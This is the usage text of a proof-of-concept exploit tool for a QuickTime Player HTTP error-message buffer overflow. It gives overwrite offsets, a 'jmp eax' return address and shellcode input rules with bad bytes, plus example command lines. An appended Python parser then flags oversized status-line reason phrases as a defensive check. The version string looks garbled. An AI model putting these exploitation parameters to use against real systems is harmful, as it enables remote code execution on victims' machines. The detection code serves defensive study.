Quicktime Player <= 18.104.22.168 HTTP error message buffer-overflow 0.1
by Luigi Auriemma
e-mail: [email protected]
Usage: quicktimebof.exe <offset> <retaddr> <shellcode>
- offset is the offset in the error message (so "HTTP/1.1 404" excluded) which
will overwrite the return address; if in doubt try with 1926, 2134, 1870 and
so on (this offset seems to change depending on the URL or the QTL file)
- retaddr is the return address you want to overwrite; a good value is
0x675b29eb because when the function returns, EAX will point to the previous
offset. 0x675b29eb has a "jmp eax", so the code flow will continue where the
bytes of our return address "eb 29" are located, which means "jmp 0x29".
The tool will automatically fill this "space" if retaddr ends with 0xeb
- shellcode is a file containing the C-style shellcode you want to execute
(so something like "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9..." and so on)
remember that the only bytes which must be avoided are 0x00 0x0d 0x0a
use "" to skip the usage of a shellcode
quicktimebof 2134 0x41414141 ""
quicktimebof 2134 0x675b29eb shellcode.txt
Remember that your ports 554 and 7070 must be closed and non-filtered!
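As an added defensive check (not part of the tool above, and not the author's code): a small parser that inspects an HTTP/RTSP response status line and flags a reason phrase long enough to reach the overflow offsets quoted above (roughly 1870 to 2134 bytes past "HTTP/1.1 404 "). The MAX_REASON threshold and the sample responses are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple

# Status line of an HTTP or RTSP response: protocol, 3-digit code, reason phrase.
# 0x0d/0x0a cannot appear inside the phrase (they terminate the line), which is
# exactly why the advisory above lists them as bytes the payload must avoid.
STATUS_LINE = re.compile(rb"^(HTTP|RTSP)/\d\.\d (\d{3}) ?([^\r\n]*)\r?\n")

# Assumed sane upper bound; legitimate servers send a few dozen bytes at most,
# well below the ~1870-byte minimum offset mentioned for the QuickTime bug.
MAX_REASON = 512


def reason_phrase(response: bytes) -> Optional[bytes]:
    """Return the reason phrase of the status line, or None if not a status line."""
    m = STATUS_LINE.match(response)
    return m.group(3) if m else None


def is_suspicious(response: bytes) -> bool:
    """True when the reason phrase exceeds MAX_REASON bytes."""
    phrase = reason_phrase(response)
    return phrase is not None and len(phrase) > MAX_REASON


def scan_responses(responses: List[bytes]) -> List[Tuple[int, int]]:
    """Return (index, phrase_length) for every response that trips the check."""
    hits = []
    for i, resp in enumerate(responses):
        phrase = reason_phrase(resp)
        if phrase is not None and len(phrase) > MAX_REASON:
            hits.append((i, len(phrase)))
    return hits


# Constructed samples: a normal 404 and an oversized one sized like the
# "quicktimebof 2134 0x41414141" crash test from the usage above.
BENIGN = b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
OVERSIZED = b"HTTP/1.1 404 " + b"A" * 2134 + b"\r\n\r\n"
RTSP_OK = b"RTSP/1.0 200 OK\r\nCSeq: 1\r\n\r\n"

if __name__ == "__main__":
    for idx, length in scan_responses([BENIGN, RTSP_OK, OVERSIZED]):
        print(f"response {idx}: reason phrase of {length} bytes exceeds {MAX_REASON}")
```

Run it against responses captured at a proxy or sensor; any hit points at a server answering the RTSP/HTTP request with a status line no legitimate server would produce.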